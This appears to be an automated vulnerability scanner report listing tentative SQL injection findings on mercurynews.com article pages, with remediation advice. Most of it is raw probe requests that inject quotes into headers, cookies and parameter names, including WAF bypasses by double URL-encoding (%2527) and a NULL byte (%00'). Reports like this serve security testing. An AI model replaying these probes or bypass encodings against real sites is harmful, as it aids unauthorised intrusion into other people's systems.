The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the Referer HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /business/ci_16792615 HTTP/1.1
Host: www.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
Referer: http://www.google.com/search?hl=en&q=%2527
Response 1
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='PayPal co-founder Peter Thiel is convening an unusual philanthropic summit where hell ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.prop3=""; // Sub sect ...[SNIP]...
Request 2
GET /business/ci_16792615 HTTP/1.1
Host: www.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
Referer: http://www.google.com/search?hl=en&q=%2527%2527
Response 2
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.mercurynews.com/business/ci_16792615 ...[SNIP]...
The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /business/ci_16792615?source=most_emailed HTTP/1.1
Host: www.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%00'
Connection: close
Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
Response 1
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='PayPal co-founder Peter Thiel is convening an unusual philanthropic summit where hell ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.prop3=""; // Sub sect ...[SNIP]...
Request 2
GET /business/ci_16792615?source=most_emailed HTTP/1.1
Host: www.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%00''
Connection: close
Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
Response 2
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='PayPal co-founder Peter Thiel is convening an unusual philanthropic summit where hell ...[SNIP]...
The UserID cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the UserID cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the UserID cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /business/ci_16792615?source=most_emailed HTTP/1.1
Host: www.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI%2527; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
Response 1
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='PayPal co-founder Peter Thiel is convening an unusual philanthropic summit where hell ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.prop3=""; // Sub sect ...[SNIP]...
Request 2
GET /business/ci_16792615?source=most_emailed HTTP/1.1
Host: www.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI%2527%2527; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
Response 2
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='PayPal co-founder Peter Thiel is convening an unusual philanthropic summit where hell ...[SNIP]...
1.177. http://www.mercurynews.com/business/ci_16792615 [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Tentative
Host: http://www.mercurynews.com
Path: /business/ci_16792615
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /business/ci_16792615?1%00'=1 HTTP/1.1
Host: www.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
Response 1
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='PayPal co-founder Peter Thiel is convening an unusual philanthropic summit where hell ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.prop3=""; // Sub sect ...[SNIP]...
Request 2
GET /business/ci_16792615?1%00''=1 HTTP/1.1
Host: www.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
Response 2
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.mercurynews.com/business/ci_16792615 ...[SNIP]...
The __qca cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __qca cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /business/ci_16799883 HTTP/1.1
Host: www.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669';
Response 1
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Today: Google will roll out Chrome OS notebooks next year, but you can apply for a public t ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.prop3=""; // Sub sect ...[SNIP]...
Request 2
GET /business/ci_16799883 HTTP/1.1
Host: www.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669'';
Response 2 (redirected)
HTTP/1.1 302 Moved Temporarily
Server: Apache/2.0.52 (Red Hat)
Location: https://secure.passport.mnginteractive.com/mngi/servletDispatch/ErightsPassportServlet.dyn?url=http://www.mercurynews.com/business/ci_16799883?nclick_check=1&forced=true
Vary: Accept-encoding
Expires: Wed, 08 Dec 2010 06:41:08 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 08 Dec 2010 06:41:08 GMT
Connection: close
Connection: Transfer-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 443
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="https://secure.passport.mnginteractive.com/mngi ...[SNIP]...
The u cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the u cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /business/ci_16799883 HTTP/1.1
Host: www.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B'; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
Response 1
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Today: Google will roll out Chrome OS notebooks next year, but you can apply for a public t ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.prop3=""; // Sub sect ...[SNIP]...
Request 2
GET /business/ci_16799883 HTTP/1.1
Host: www.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B''; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
Response 2 (redirected)
HTTP/1.1 302 Moved Temporarily
Server: Apache/2.0.52 (Red Hat)
Location: https://secure.passport.mnginteractive.com/mngi/servletDispatch/ErightsPassportServlet.dyn?url=http://www.mercurynews.com/business/ci_16799883?nclick_check=1&forced=true
Vary: Accept-encoding
Expires: Wed, 08 Dec 2010 06:40:20 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 08 Dec 2010 06:40:20 GMT
Connection: close
Connection: Transfer-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 443
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="https://secure.passport.mnginteractive.com/mngi ...[SNIP]...
The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /business/ci_16799954 HTTP/1.1
Host: www.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
Referer: http://www.google.com/search?hl=en&q='
Response 1
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Microsoft is tweaking its Internet Explorer with an upcoming feature that will let users ad ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.prop3=""; // Sub sect ...[SNIP]...
Request 2
GET /business/ci_16799954 HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669; Referer: http://www.google.com/search?hl=en&q=''
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.mercurynews.com/business/ci_16799954 ...[SNIP]...
1.181. http://www.mercurynews.com/california-high-speed-rail/ci_16793216 [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Tentative
Host: http://www.mercurynews.com
Path: /california-high-speed-rail/ci_16793216
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /california-high-speed-rail/ci_16793216?1%00'=1 HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='San Jose City Council will hear update on high-rise bridge, but critics still want tunnel o ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.p ...[SNIP]...
Request 2
GET /california-high-speed-rail/ci_16793216?1%00''=1 HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.mercurynews.com/california-high-spee ...[SNIP]...
The Zvents cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Zvents cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the Zvents cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /celebrities/ci_16800030 HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4%2527; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
